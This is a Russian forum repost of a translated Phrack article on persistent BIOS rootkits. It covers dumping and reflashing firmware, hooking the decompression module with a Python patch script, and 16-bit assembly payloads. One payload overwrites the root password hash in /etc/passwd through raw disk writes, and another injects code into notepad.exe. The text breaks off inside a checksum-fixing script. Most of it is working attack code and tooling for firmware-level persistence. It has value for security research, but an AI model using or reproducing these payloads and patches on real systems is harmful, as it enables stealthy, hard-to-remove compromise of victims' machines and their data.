Статьи (Phrack 66): Persistent BIOS Infection (Устойчивый BIOS inj)

Discussion in 'Статьи' started by Delivery Man, 22 Oct 2010.

  1. Delivery Man

    Delivery Man New Member

    Joined:
    2 Jul 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Авторы: aLS и Alfredo
    Переводчик: Ex0rcist a.k.a. Heroin
    Оригинал (EN): www.phrack.org
    Источник (RU): www.reverse4you.org
    Persistent BIOS Infection


    ------[ 0.- Предисловие

    Уважаемые пользователи, если вы читаете эту статью, мы можем предположить, что вы уже знаете, что такое BIOS и как он работает. Или, по крайней мере, вы имеете общtе представление о том, что делает BIOS, и его значение для нормальной работы компьютера. Основываясь на этом, мы кратко объясним некоторые основные понятия, чтобы ввести в курс дела, а затем мы будем переходить к более актуальным техническим тонкостям.

    ------[ 1.- Введение

    На протяжении многих лет многое было сказано по этой теме. Но кроме старого вируса Chernobyl, который просто обнулял BIOS, если твоя материнская плата была одной из поддерживаемых, или для некоторых изменений для моддинга, такими как работа Pinczakko, мы не в состоянии найти общедоступные разработки, характерные для определенного класса вредоносных BIOS инфекций. Люди, как правило, думают, что эта тема раскурена вдоль и поперек, стара и имеются готовые разработки. Иногда даже путают с MBR вирусами. Мы намерены показать, что такой тип атаки возможен и может быть очень надежным и стойким руткитом, находясь в прошивке BIOS и оставаясь невидимой для ОС инфекцией.

    В этой статье мы покажем универсальный метод, чтобы внедрить код в BIOS прошивки. Этот метод позволит нам встроить наш собственный код в BIOS прошивки так, что он будет выполнен непосредственно перед загрузкой операционной системы.

    Мы также продемонстрируем, как с контролем жесткого диска или просто путем изменения конфиденциальных данных ОС в Linux box, развертывать полностью функциональный код непосредственно в процесс Windows.


    ---[ 1.1 - Назначение статьи

    Основной идеей данной работы является показать то, как BIOS прошивки можно модифицировать и использовать как метод сохранения контроля после успешного рутанья. Ну, начнем потихонечку и постепенно будем рассматривать возникающие вопросы, разделив статью в двух основных направлениях:

    - Модификации VMWare's (Phoenix) BIOS

    - Рельные модификации BIOS

    В каждом разделе мы расскажем основные моменты, чтобы показать, как провести атаку, а затем перейдем непосредственно к рассмотрению кода.


    ------[ 2.- Основы BIOS

    ---[2.1 - Введение в BIOS

    Из википедии:

    ---[2.1.1 - Железо

    Еще в 80-х BIOS прошивки загружались в ПЗУ или ППЗУ чипы, которые не могли быть изменены, но в настоящее время эта прошивка хранится в EEPROM (электрически стираемая программируемая Read-Only память). Этот вид памяти разрешает пользователю перепрошивать его, позволяя поставщику создавать обновления встроенного программного обеспечения для того чтобы исправить ошибки, добавить поддержку нового железа и функциональности.

    ---[2.1.2 - Как это работает?

    BIOS имеет очень важное значение в работе компьютера. Он должен быть всегда доступен, как первая инструкция, выполняемая центральным процессором, при его включении. Вот почему он хранится в ROM.

    Первый модуль BIOS называется загрузочный блок (Bootblock) и отвечает за POST (Power-On Self-Test) и аварийную загрузочную процедуру. POST является общим термином предварительной загрузки для компьютера, маршрутизатора или принтера. Он должен протестировать и инициализировать почти все аппаратные компоненты в системе, чтобы убедиться, что все работает правильно.

    Современный BIOS имеет модульную структуру, что означает, что есть несколько модулей, интегрированных в одну прошивку, каждый из которых отвечает за конкретные задачи, от аппаратной инициализации до безопасности.

    Каждый модуль является сжатым, поэтому есть точный алгоритм декомпрессии, отвечающий за декомпрессию и проверку других модулей, которые впоследствии будут выполняться.

    После декомпрессии, определяются другие аппаратные средства, такие как PCI ROM (если необходимо), и в конце концов, в поисках загрузчика, читается 0 сектор жесткого диска (MBR), чтобы начать загрузку операционной системы.


    ---[2.2 - Файловая структура прошивки

    Как мы упоминали ранее, прошивка BIOS имеет модульную структуру. При хранении в нормальном файле, он состоит из нескольких LZH сжатых модулей, каждый из которых содержит 8 бит контрольной суммы. Однако, не все модули являются сжатыми. Несколько модулей, такие как загрузочный блок (Bootblock) и алгоритм декомпрессии, явно не сжаты, потому что они являются фундаментальной частью процесса загрузки и должны выполнять декомпрессию других модулей. Далее мы увидим, почему для нас это так удобно.

    Мы имеем выход Phnxdeco (доступны в Debian репозитории), открытый исходный код для разбора и анализа прошивки Phoenix BIOS ROM (то, что собираемся извлечь в 3.1.1):

    Code:
    +-------------------------------------------------------------------------+
    | Class.Instance (Name)     Packed --->  Expanded      Compression  Offse |
    +-------------------------------------------------------------------------+
    
    B.03 (    BIOSCODE)   06DAF (28079) => 093F0 ( 37872)  LZINT ( 74%)  446DFh
    B.02 (    BIOSCODE)   05B87 (23431) => 087A4 ( 34724)  LZINT ( 67%)  4B4A9h
    B.01 (    BIOSCODE)   05A36 (23094) => 080E0 ( 32992)  LZINT ( 69%)  5104Bh
    C.00 (      UPDATE)   03010 (12304) => 03010 ( 12304)   NONE (100%)  5CFDFh
    X.01 (     ROMEXEC)   01110 (04368) => 01110 (  4368)   NONE (100%)  6000Ah
    T.00 (    TEMPLATE)   02476 (09334) => 055E0 ( 21984)  LZINT ( 42%)  63D78h
    S.00 (     STRINGS)   020AC (08364) => 047EA ( 18410)  LZINT ( 45%)  66209h
    E.00 (       SETUP)   03AE6 (15078) => 09058 ( 36952)  LZINT ( 40%)  682D0h
    M.00 (       MISER)   03095 (12437) => 046D0 ( 18128)  LZINT ( 68%)  6BDD1h
    L.01 (        LOGO)   01A23 (06691) => 246B2 (149170)  LZINT (  4%)  6EE81h
    L.00 (        LOGO)   00500 (01280) => 03752 ( 14162)  LZINT (  9%)  708BFh
    X.00 (     ROMEXEC)   06A6C (27244) => 06A6C ( 27244)   NONE (100%)  70DDAh
    B.00 (    BIOSCODE)   001DD (00477) => 0D740 ( 55104)  LZINT (  0%)  77862h
    *.00 (      TCPA_*)   00004 (00004) => 00004 (   004)   NONE (100%)  77A5Ah
    D.00 (     DISPLAY)   00AF1 (02801) => 00FE0 (  4064)  LZINT ( 68%)  77A79h
    G.00 (  DECOMPCODE)   006D6 (01750) => 006D6 (  1750)   NONE (100%)  78585h
    A.01 (        ACPI)   0005B (00091) => 00074 (   116)  LZINT ( 78%)  78C76h
    A.00 (        ACPI)   012FE (04862) => 0437C ( 17276)  LZINT ( 28%)  78CECh
    B.00 (    BIOSCODE)   00BD0 (03024) => 00BD0 (  3024)   NONE (100%)  7D6AAh
    Мы видим здесь различные части файла прошивки, содержащие DECOMPCODE раздел, где расположен алгоритм декомпрессии, а также другие, не рассматриваемые в этой статье параметры.


    ---[2.3 - Обновление

    Программное обеспечение BIOS не так уж сильно отличается от любого другого программного обеспечения. Это относится к ошибкам, которые можно встретить и в другом программном обеспечении. С новыми версиями выходит поддержка нового железа, дополнения, исправление ошибок и т. д. Но процесс обновления может быть очень опасным на реальной машине. BIOS является одним из основных компонентов компьютера. Это первая часть кода, выполняемая при включении машины. Именно поэтому мы должны быть очень осторожны, когда делаем такого рода вещи. Неудачное обновление BIOS может привести к зависанию машины. И ты соснешь тунца.

    Вот почему так важно иметь такую платформу для тестирования как VMWare. По крайней мере на первое время, потому что, как мы увидим далее, есть много различий между VMware и реальным железом.


    ------[ 3 .- Заражение BIOS

    --- [3.0 - Первичная настройка

    --- [3.1 - Модификация VMware (Phoenix) BIOS

    Во-первых, мы должны получить действительную прошивку VMWARE BIOS для работы. Для того чтобы читать EEPROM (где хранится прошивка BIOS) нам необходимо запустить код в режиме отладки ядра, чтобы отправлять и получать данные непосредственно в южный мост через порты ввода-вывода. Для этого нам также необходимо знать некоторые конкретные данные о текущем оборудовании. Эти данные обычно предоставляются производителем. Более того, почти все поставщики плат предоставляют некоторые инструменты для обновления BIOS, и очень часто они имеют возможность резервного копирования существующей прошивки.

    В VMWare мы не можем использовать эти инструменты, потому что эмулируемое железо не имеет ту же функциональность, как реальное оборудование. В этом есть смысл... Почему бы не обновить VMWare BIOS изнутри...?

    ---[3.1.1 - Дамп VMWare BIOS

    Для начала было бы неплохо иметь встроенный GDB сервер, который предлагает VMWare. Он позволяет нам производить отладку и понимать, что происходит. Таким образом, в целях исправления и изменения некоторых маленьких кусков кода, чтобы начать тестирование, мы использовали некоторые случайные массивы байтов в качестве шаблонов для поиска BIOS в памяти.П роделывая это, мы обнаружили, что в VMware-VMX существует основная исполняемая VMware секция, весом почти 256кб, которая называется .bios440 (которая в нашей версии VMware находится между смещением в файле 0x6276c7-0x65B994). Она содержит всю прошивку BIOS, точно так же, как и в обычном файле, готовом к выполнению.Вы можете использовать objdump для того чтобы видеть разделы файла:

    Code:
    objdump -h vmware-vmx
    И вы можете сдампить его, используя инструмент objcopу:

    Code:
    objcopy -j .bios440 -O binary --set-section-flags .bios440=a \ 
    vmware-vmx bios440.rom.zl
    Ммм... Это означает, что... если у нас есть привилегии на машине жертвы, мы можем изменить исполняемый VMware-VMX, вставляя наш собственный инфицированный BIOS, и он будет выполняться каждый раз, когда загружается VMware. Для каждого из VMware на компьютер. Sweet!

    Но Существуют более простые способы решения этой задачи. Мы собираемся изменить его несколько раз, и он не будет работать все время... Чем проще, тем лучше.


    ---[3.1.2 - Настройка VMWARE для загрузки альтернативного BIOS

    Мы поняли, что VMWare предлагает очень практичный путь, чтобы пользователь мог использовать конкретный файл прошивки BIOS прямо через файл конфигурации .VMX. Существует не очень известный тег, который называется "bios440.filename" и он позволяет избегать использование встроенного в VMWare BIOS и вместо этого позволяет нам указать BIOS файл, который нужно использовать. Добавь в файл .VMX следующий код:

    Code:
    bios440.filename = "path/to/file/bios.rom"
    На нах! Теперь у нас есть другая прошивка BIOS, которая работает в нашей VM, и в сочетании с:

    Code:
    debugStub.listen.guest32 = "TRUE" or
    debugStub.listen.guest64 = "TRUE" 
    ставит GDB заглушки на VMWare и ждет вашего соединения на локальный порт 8832. И мы в конечном итоге с остаемся с отличной и полностью поддающейся отладке исследовательской платформой. Нравится? Другими важными скрытыми тегами, которые могут быть полезны, являются:

    Code:
            bios.bootDelay = "3000"                  # Для задержки загрузки X
                                                       миллисекундах
            debugStub.hideBreakpoints = "TRUE"       # Позволяет GDB
                                                       работать с остановками
            debugStub.listen.guest32.remote = "TRUE" # Для отладки с 
                                                       другой машины (32bit)
            debugStub.listen.guest64.remote = "TRUE" # Для отладки с 
                                                       другой машины (64bit)
            monitor.debugOnStartGuest32 = "TRUE"     # Позволяет остановить VM
                                                       на первой инструкции
                                                       по адресу 0xFFFF0

    ---[3.1.3 - Распаковка прошивки

    Как мы уже говорили, некоторые из модулей сжаты LZH. Есть несколько доступных средств для извлечения и распаковки каждого отдельного модуля файла прошивки. Наиболее часто используемыми являются Phnxdeco и Awardeco (два отличных Linux GPL инструмента) совместно с Phoenix BIOS Editor и Award BIOS Editor (не GPL инструменты для Windows).
    Если хочешь, можешь использовать Phoenix BIOS Editor в Linux с помощью wine. Он будет извлекать все модули в каталог/временный каталог внутри Phoenix BIOS Editor, которые готовы к открытию привычным тебе дизассемблером. Хорошей возможностью Phoenix BIOS Editor является то, что он также может восстанавливать основной файл прошивки. Он может сжимать и встраивать различные распакованные модули, чтобы прошивка была в неизменном виде. Учти, что эта функция была сделана для последних версий Phoenix BIOS и он пропускает проверку контрольной суммы, поэтому нам придется делать это вручную (мы увидим это в 3.2.2.1)

    Некоторые из этих задач выполняются отдельными инструментами, которые могут быть вызваны непосредственно из командной строки, что является очень удобным, для того чтобы автоматизировать процесс для исследования простых скриптов.

    ---[3.1.4 - Модификации

    Итак, вот мы и приблизились к самому интересному. У нас есть все распакованные модули, и возможность их изменения, а затем и восстановления в полностью рабочий BIOS Flash Update. Первая фраза, которая приходит на ум это, "где патчить?". Мы можем поставить "ловушку" на выполнение нашего кода почти в любом месте. Но мы должны все продумать, прежде чем решить о том, в каком месте патчить.
    В начале мы думали о подключении к первой инструкции, которую выполняет процессор, а именно 0xF000: FFF0. Это казалось самым лучшим вариантом, потому что эта команда всегда в точном месте, и ее легко найти. Но мы должны принимать во внимание сам процесс выполнения. Чтобы наш код работал, все распознавание оборудования должно производится нами (DRAM, северный мост, кэш, PCI и т.д.)

    Например, если мы хотим иметь доступ к жестким дискам, мы должны быть уверены, что, при выполнении нашего кода, мы уже имеем доступ к жесткому диску. По этой причине мы выбрали для подключения алгоритм декомпрессии. Также это удобно потому, что он не меняется от версии к версии. Кроме того, его очень легко найти путем поиска по шаблону. Он не сжат и вызывается много раз в течение последовательной загрузки BIOS, что дает нам возможность проверить, все ли необходимые службы доступны и приступить к реальным вещам. Далее мы имеем дамп скрипта для быстрого извлечения прошивки модулей, сбора данных, их внедрения, и компиляции измененного файла прошивки. PREPARE.EXE и CATENATE.EXE являются собственными инструменты создания прошивки Phoenix, которые можно найти в Phoenix BIOS Editor, а также в комплекте с другими инструментами. В более поздних версиях скрипта эти инструменты не нужны (как показано в 3.2.2.1).

    Code:
    #!/usr/bin/python import os,struct
    
    #--------------------------- Decomp processing ------------------------------
    #assemble the whole code to inject
    os.system('nasm ./decomphook.asm')
    decomphook = open('decomphook','rb').read()
    print "Leido hook: %d bytes" % len(decomphook)
    minihook = '\x9a\x40\x04\x3b\x66\x90' # call near +0x430
    
    #Load the decompression rom
    decorom = open('DECOMPC0.ROM.orig','rb').read()
    
    #Add the hook
    hookoffset=0x23
    decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
    
    #Add the shellcode
    decorom+="\x90"*100+decomphook
    decorom=decorom+'\x90'*10
    
    #recalculate the ROM size
    decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]
    
    #Save the patched decompression rom
    out=open('DECOMPC0.ROM','wb')
    out.write(decorom)
    out.close()
    
    #Compile 
    print "Prepare..."
    os.system('./PREPARE.EXE ./ROM.SCR.ORIG')
    print "Catenate..."
    os.system('./CATENATE.EXE ./ROM.SCR.ORIG')
    os.system('rm *.MOD')
    ---[3.1.5 - Подгрузка

    Прежде чем говорить о подгрузке, мы должны решить, "где" мы будем хранить нашу подгрузку, и это не тривиальная задача. Мы обнаружили, что существует много заполняемого пространства в конце алгоритма декомпрессии, которое при выделении будет использоваться как буфер для хранения распакованного кода. Таким образом, мы будем внедрять любой код, который нам нужен. Это немного усложняет подгрузку, потому что при этом требуется разбить шеллкод на два участка. Первый выполняется при внедрении в начале алгоритма декомпрессии. Простой вызов, который перенаправляет исполняемый поток на наш код и далее ко второму безопасному этапу, который, как мы знаем, остается неиспользованным в течение всего процесса подгрузки. Затем, обновляя код, указывает новый адрес и выполняет исходные инструкции.
    [​IMG]

    Давай посмотрим код:

    Code:
    |-----------------------------------------------------------|
    
    BITS 16
    
    ;Extent to search (in 64K sectors, aprox 32 MB)
    %define EXTENT 10 
    
    start_mover:
    
       ;save regs
       ;jmp start_mover
        pusha
        pushf
    
       ; set dst params to move the shellcode
        xor ax, ax
        xor di, di
        xor si, si
        push cs
        pop ds
        mov es, ax ; seg_dst
        mov di, 0x8000 ; off_dst
        mov cx, 0xff ; code_size
    
       ; get_eip to have the 'source' address
        call b
    b:
        pop si
        add si, 0x25  (Offset needed to reach the second stage payload)
        rep movsw
    
        mov ax, word [esp+0x12] ; get the caller address to patch the original hook
        sub ax, 4
        mov word [eax], 0x8000 ; new_hook offset
        mov word [eax+2], 0x0000 ; new_hook segment
    
        ; restore saved regs
        popf
        popa
    
        ; execute code smashed by 'call far'
        ;mov es,ax
        mov bx,es
        mov fs,bx
        mov ds,ax
        retf
    		
    		
        ;Here goes a large nopsled and next, the second stage payload
    		
    	|------------------------------------------------------------|
    Bторой этап, в настоящее время находящийся в неиспользуемом пространстве, должен получить несколько готовых сигналов, чтобы знать, доступны ли сервисы, которые мы хотим использовать.
     
  2. Delivery Man

    Delivery Man New Member

    Joined:
    2 Jul 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ---[3.1.5.1 - Готовый сигнал

    В VMWare мы видели, что когда наша подгрузка на второй стадии, и IVT уже инициализирован, у нас есть все, что нам нужно. Исходя из этого мы решили использовать IVT инициализацию, как сигнал готовности. Это очень просто, потому что всегда отображается на 0000:0000. Каждый раз, когда шеллкод запускается на выполнение, проверяем, инициализируется ли IVT с правильными указателями, выполняется ли шеллкод, если нет, то возвращается, ничего не делая.


    ---[3.1.5.1 - The Real stuff

    Что же мы будем делать теперь, когда у нас есть исполняемый код, и мы знаем, что у нас есть все сервисы? Мы не можем взаимодействовать с ОС отсюда. В этот момент операционная система просто массив символов, находящийся на диске. Погоди! Мы же имеем доступ к диску через Int 13h (низкоуровневая служба). Мы можем изменить его в любое время, какое нам нужно! Оке, давай попробуем это проделать. При реальной реализации вредоносного кода тебе нужно накодить некий основной драйвер, чтобы корректно различать файловые системы, по крайней мере FAT и NTFS (возможно также использование GRUB или LILO). Для этой статьи, в доказательство концепции, мы будем использовать Int 13h для последовательного чтения диска в нестандартном режиме. Мы будем реализовывать все это дело через (_о_), но как мы говорили ранее, в общем случае, изменение, добавление и удаление любых файлов на диске позволет злоумышленнику изменять модули драйверов, заражать файлы, отключать антивирус или антируткиты и т.д.

    Используем шеллкод, с помощью которого мы просмотрим весь диск в соответствии с маской: "root:$", чтобы найти запись /etc/passwd. Затем мы заменим root хэш нашим собственным хэшем, установив пароль "root" для суперпользователя.

    Code:
    -------------------------------------------------------------
    ; The shellcode doesn't have any type of optimization, we tried to keep it 
    ; simple, 'for educational purposes' 
    
    ; 16 bit shellcode
    ; use LBA disk access to change root password to 'root'
    
    BITS 16	
    	push es
    	push ds
    	pushad
    	pushf
    
    	; Get code address
    	call gca
    gca:    pop bx
    
    	; construct DAP
    	push cs
    	pop ds
    	mov si,bx
    	add si,0x1e0 ; DAP 0x1e0 from code
    	mov cx,bx
    	add cx,0x200 ; Buffer pointer 0x200 from code
    	mov byte [si],16 ;size of SAP
    	inc si
    	mov byte [si],0  ;reserved
    	inc si
    	mov byte [si],1  ;number of sectors
    	inc si
    	mov byte [si],0  ;unused
    	inc si
    	mov word [si],cx ;buffer segment
    	add si,2
    	mov word [si],ds;buffer offset
    	add si,2
    	mov word [si],0 ; sector number
    	add si,2
    	mov word [si],0 ; sector number
    	add si,2
    	mov word [si],0 ; sector number
    	add si,2
    	mov word [si],0 ; sector number
    
    	mov di,0
    	mov si,0
    mainloop:
    	push di
    	push si
    		        
    	;-------- Inc sector number
    	mov cx,3
    	mov si,bx
    	add si,0x1e8
    loopinc:
    	mov ax,word [si]
    	inc ax
    	mov word [si],ax
    	cmp ax,0
    	jne incend
    	add si,2
    	loop loopinc
    incend:
    	;-------- LBA extended read sector
    	mov ah,0x42 ; call number
    	mov dl,0x80 ; drive number 0x80=first hd
    	mov si,bx
    	add si,0x1e0
    	int 0x13
    	jc mainend
    	nop
    	nop
    	nop
    
    	;-------- Search for 'root'
    	mov di,bx
    	add di,0x200 ; pointer to buffer
    	mov cx,0x200 ; 512 bytes per sector
    searchloop:
    	cmp word [di],'ro'
    	jne notfound
    	cmp word [di+2],'ot'
    	jne notfound
    	cmp word [di+4],':$'
    	jne notfound
    	jmp found ; root found!
    notfound:
    	inc di
    	loop searchloop
    
    endSearch:
    	pop si
    	pop di
    
    	inc di
    	cmp di,0
    	jne mainloop
    	inc si
    	cmp si,3
    	jne mainloop
    
    mainend:
    	popf
    	popad
    	pop ds
    	pop es
    	int 3
    found:
    ;replace password with: 
    ;root:$2a$08$Grx5rDVeDJ9AXXlXOobffOkLOnFyRjk2N0/4S8Yup33sD43wSHFzi:
    ;Yes we could've used rep movsb, but we kinda suck.
    	mov word[di+6],'2a'
    	mov word[di+8],'$0'
    	mov word[di+10],'8$'
    	mov word[di+12],'Gr'
    	mov word[di+14],'rD'
    	mov word[di+16],'Ve'
    	mov word[di+18],'DJ'
    	mov word[di+20],'9A'
    	mov word[di+22],'XX'
    	mov word[di+24],'lX'
    	mov word[di+26],'Oo'
    	mov word[di+28],'bf'
    	mov word[di+30],'fO'
    	mov word[di+32],'kL'
    	mov word[di+34],'On'
    	mov word[di+36],'Fy'
    	mov word[di+38],'Rj'
    	mov word[di+40],'k2'
    	mov word[di+42],'N0'
    	mov word[di+44],'/4'
    	mov word[di+46],'S8'
    	mov word[di+48],'Yu'
    	mov word[di+52],'p3'
    	mov word[di+54],'3s'
    	mov word[di+56],'D4'
    	mov word[di+58],'3w'
    	mov word[di+60],'SH'
    	mov word[di+62],'Fz'
    	mov word[di+64],'i:'
    	;-------- LBA extended write sector
    	mov ah,0x43 ; call number
    	mov al,0 ; no verify 
    	mov dl,0x80 ; drive number 0x80=first hd
    	mov si,bx
    	add si,0x1e0
    	int 0x13
    	jmp mainend
    Этот код также представляет собой подгрузку, но в этом случае мы ищем по всему диску, пытаясь сопоставить шаблон внутри notepad.exe, и затем вводим кусок кода с простым вызовом MessaBoxA и ExitProcess, для его красивого завершения.

    Code:
    		hook_start:
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    			nop
    		        ;jmp hook_start
    		        ;mov bx,es
    		        ;mov fs,bx
    		        ;mov ds,ax
    		        ;retf
    
    		        pusha
    		        pushf
    		        xor di,di
    			mov ds,di
    			; check to see if int 19 is initialized
    			cmp byte [0x19*4],0x00 
    			jne ifint
    
    		noint:
    		        ;jmp noint ; loop to debug
    		        popf
    		        popa
    		        ;mov es, ax
    		        mov bx, es
    			mov fs, bx
    			mov ds, ax
    		        retf
    
    
    		ifint:
    		        ;jmp ifint ; loop to debug
    			cmp byte [0x19*4],0x46
    		        je noint
    
    		;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    		initShellcode:
    		    ;jmp initShellcode ; DEBUG
    		    cli
    		    push es
    		    push ds
    		    pushad
    		    pushf
    
    		    ; Get code address
    		    call gca
    
    		gca:
    		    pop bx
    		    ;---------- Set screen mode
    		    mov ax,0x0003
    		    int 0x10
    		    ;---------- construct DAP
    		    push cs
    		    pop ds
    		    mov si,bx
    		    add si,0x2e0 ; DAP 0x2e0 from code
    		    mov cx,bx
    		    add cx,0x300 ; Buffer pointer 0x300 from code
    		    mov byte [si],16 ;size of SAP
    		    inc si
    		    mov byte [si],0  ;reserved
    		    inc si
    		    mov byte [si],1  ;number of sectors
    		    inc si
    		    mov byte [si],0  ;unused
    		    inc si
    		    mov word [si],cx ;buffer segment
    		    add si,2
    		    mov word [si],ds;buffer offset
    		    add si,2
    		    mov word [si],0 ; sector number
    		    add si,2
    		    mov word [si],0 ; sector number
    		    add si,2
    		    mov word [si],0 ; sector number
    		    add si,2
    		    mov word [si],0 ; sector number
    
    		    mov di,0
    		    mov si,0
    
    		    ;-------- Function 41h: Check Extensions
    		    push bx
    		    mov ah,0x41 ; call number
    		    mov bx,0x55aa;
    		    mov dl,0x80 ; drive number 0x80=first hd
    		    int 0x13
    		    pop bx
    		    jc mainend_near
    		    ;-------- Function 00h: Reset Disk System
    		    mov ah, 0x00
    		    int 0x13
    		    jc mainend_near
    		    jmp mainloop
    		mainend_near:
    		    jmp mainend
    		mainloop:
    		    cmp di,0
    		    jne nochar
    		    ;------- progress bar (ABCDE....)
    		    push bx
    		    mov ax,si
    		    mov ah,0x0e
    		    add al,0x41
    		    mov bx,0
    		    int 0x10
    		    pop bx
    		nochar:
    		    push di
    		    push si
    		    ;jmp incend    ;
    		    ;-------- Inc sector number
    		    mov cx,3
    		    mov si,bx      ; bx = curr_pos 
    		    add si,0x2e8   ; +2e8 LBA Buffer
    
    		loopinc:
    		    mov ax,word [si]
    		    inc ax
    		    mov word [si],ax
    		    cmp ax,0
    		    jne incend
    		    add si,2
    		    loop loopinc
    
    		incend:
    		LBA_read:
    		    ;jmp int_test
    		    ;-------- LBA extended read sector
    		    mov ah,0x42 ; call number
    		    mov dl,0x80 ; drive number 0x80=first hd
    		    mov si,bx
    		    add si,0x2e0
    		    int 0x13
    		    jnc int13_no_err
    		    ;-------- Write error character
    		    push bx
    		    mov ax,0x0e45
    		    mov bx,0x0000
    		    int 0x10
    		    pop bx
    		int13_no_err:
    		    ;-------- Search for 'root'
    		    mov di,bx
    		    add di,0x300 ; pointer to buffer
    		    mov cx,0x200 ; 512 bytes per sector
    
    		searchloop:
    		    cmp word [di],0x706a
    		    jne notfound
    		    cmp word [di+2],0x9868
    		    jne notfound
    		;debugme:
    		;    je debugme
    		    cmp word [di+4],0x0018
    		    jne notfound
    		    cmp word [di+6],0xe801  
    		    jne notfound
    		    jmp found ; root found!
    
    
    		notfound:
    		    inc di
    		    loop searchloop
    
    		endSearch:
    		    pop si
    		    pop di
    
    		    inc di
    		    cmp di,0
    		    jne mainloop
    		    inc si
    		    cmp si,EXTENT ;------------ 10x65535 sectors to read
    		    jne mainloop
    		    jmp mainend
    
    		exit_error:  
    		    pop si
    		    pop di
    
    		mainend:
    		    popf
    		    popad
    		    pop ds
    		    pop es
    		    sti
    
    		    popf
    		    popa
    		    mov bx, es
    		    mov fs, bx
    		    mov ds, ax
    		    retf
    
    		writechar:
    		    push bx
    		    mov ah,0x0e
    		    mov bx,0x0000
    		    int 0x10
    		    pop bx
    		    ret
    		found:
    		    mov al,0x46
    		    call writechar
    
        		;mov word[di], 0xfeeb ; Infinite loop - Debug
    		    mov word[di], 0x00be
    		    mov word[di+2], 0x0100
    		    mov word[di+4], 0xc700
    		    mov word[di+6], 0x5006
    		    mov word[di+8], 0x4e57
    		    mov word[di+10], 0xc744
    		    mov word[di+12], 0x0446
    		    mov word[di+14], 0x2121
    		    mov word[di+16], 0x0100
    		    mov word[di+18], 0x016a
    		    mov word[di+20], 0x006a
    		    mov word[di+22], 0x6a56
    		    mov word[di+24], 0xbe00
    		    mov word[di+26], 0x050b
    		    mov word[di+28], 0x77d8
    		    mov word[di+30], 0xd6ff
    		    mov word[di+32], 0x00be
    		    mov word[di+34], 0x0000 
    		    mov word[di+36], 0x5600
    		    mov word[di+38], 0xa2be
    		    mov word[di+40], 0x81ca
    		    mov word[di+42], 0xff7c
    		    mov word[di+44], 0x90d6
    
    		;-------- LBA extended write sector
    		    mov ah,0x43 ; call number
    		    mov al,0 ; no verify 
    		    mov dl,0x80 ; drive number 0x80=first hd
    		    mov si,bx
    		    add si,0x2e0
    		    int 0x13
    		    jmp notfound; continue searching
    		    nop	

    ---[3.2 - Реальные модификации BIOS

    VMWare - отлично подходит для исследования BIOS и разработоки платформы. Но для завершения этого исследования, мы должны атаковать реальную систему. Для этого мы использовали обычную материнскую плату (Asus A7V8X-MX) очень популярной версией Award-Phoenix 6.00 PG BIOS.


    ---[3.2.1 - Дамп прошивки BIOS

    Флэш-микросхемы отлично совместимы, и даже взаимозаменяемы. Но они подключаются к материнской плате по-разному (PCI, ISA bridge, и т.д.), что, в общем случае, делает чтение довольно сложной адачей. Как же мы сможем сделать руткит, если мы даже не можем найти способ надежно читать память? Конечно, одним из решений может являться Flash reader, но на данном этапе мы его не имеем, и это не вариант, если ты хочешь удаленно заразить BIOS без физического доступа. Поэтому мы начали искать программные альтернативы. Первый инструмент, который мы нашли, работал неплохо. Это утилита FlashROM от проекта coreboot с открытым исходным кодом, см. [COREBOOT] (также имеется в Debian репозиториях). Она содержит обширную базу данных чипов и обладает read/write методами. Мы обнаружили, что она почти всегда работает, даже если придется вручную указать модель IC, потому что утилита не всегда распознает их автоматически.

    Code:
    $ flashrom -r mybios.rom
    Как правило, команда, указанная выше - это все, что вам нужно. BIOS должен быть в mybios.rom файле. Фишка в том, что если он говорит, что не может обнаружить чип, ты должны написать скрипт, чтобы попытаться заюзать все известные чипы. Нам еще предстоит найти BIOS'ы, которые не могут быть считаны с помощью этой методики. Запись немного сложнее, так как FlashROM'y необходимо правильно определить IC, что позволит ему запись. Это ограничение можно обойти путем изменения исходного кода. Но нужно учитывать, что в этом случае можно нахер спалить свою материнку.

    Мы также использовали FlashROM в общем случае для загрузки измененного BIOS на материнскую плату.


    ---[3.2.2 - Модификация

    После того как мы получили образ BIOS, мы можем начать процесс вставки вредоносного кода. При изменении реального BIOS'a, в частности Award / Phoenix BIOS'a, мы столкнулись с некоторыми большими проблемами:
    1) отсутствие документации BIOS структуры
    2) отсутствие инструментов упаковки / распаковки
    3) отсутствие способа отладки оборудования.

    Есть множество бесплатных инструментов для управления BIOS, но как всегда получается с собственными разработками форматов, мы не могли найти инструмент, который работал бы именно с нашей прошивкой. Мы можем использовать утилиты Linux awardeco и phnxdeco в качестве отправной точки, но они часто работают со сбоями на современных BIOS версиях.

    Наш план для получения исполняемого кода таков:
    1) мы должны сделать произвольные изменения (мы должны знать позиции контрольной суммы и алгоритмы)
    2) основной код должен быть вставлен в общей, легкодоступной части BIOS.
    3) после выполнения кода, может быть вставлен Shellcode.


    ---[3.2.2.0 - Black Screen of Death

    Ты должен понимать, что сломаешь много BIOS чипов, проделывая эти трюки. Но большинство BIOS имеют механизм безопасности для восстановления поврежденной прошивки. RTFM (читаймануалы по
    материнской плате).

    Если это не поможет, ты можешь использовать чип для "горячей замены": ты грузишься с рабочего чипа, затем делаешь его "горячую замену" на поврежденный, и перепрошиваешь. Конечно, для этой техники у тебя должен быть резервный рабочий BIOS.


    --- [3.2.2.1 - Изменение бита в единицу времени

    Наши первые попытки были неудачными и почти всегда система не загружалась. В основном мы не обращали внимания, сколько контрольных сумм имеет BIOS, но ты должен будешь пропатчить каждую или лицезреть ошибку "BIOS CHECKSUM ERROR" на черном экране смерти. Черный экран смерти дает нам подсказку, он говорит: "контрольная сумма". Скорее всего он должен быть каким-то дополнением, сравневаемым с числом. И этот вид проверки можно легко обойти, внедряя значение в определенное место, которое будет являться "дополнением". Разве это не весомая причина для создания CRC? Оказывается, что все контрольные суммы были 8-битными, и, коснувшись только одного байта в конце шеллкода, все контрольные суммы были правильными. Можно написать очень простой алгоритм на вложения внутри этого Python скрипта:

    Code:
    -------------------------------------------------------------
    	modifBios.py
    
    	#!/usr/bin/python
    	import os,sys,math
    
    	# Usage
    	if len(sys.argv)<3:
            	print "Modify and recalculate Award BIOS checksum"
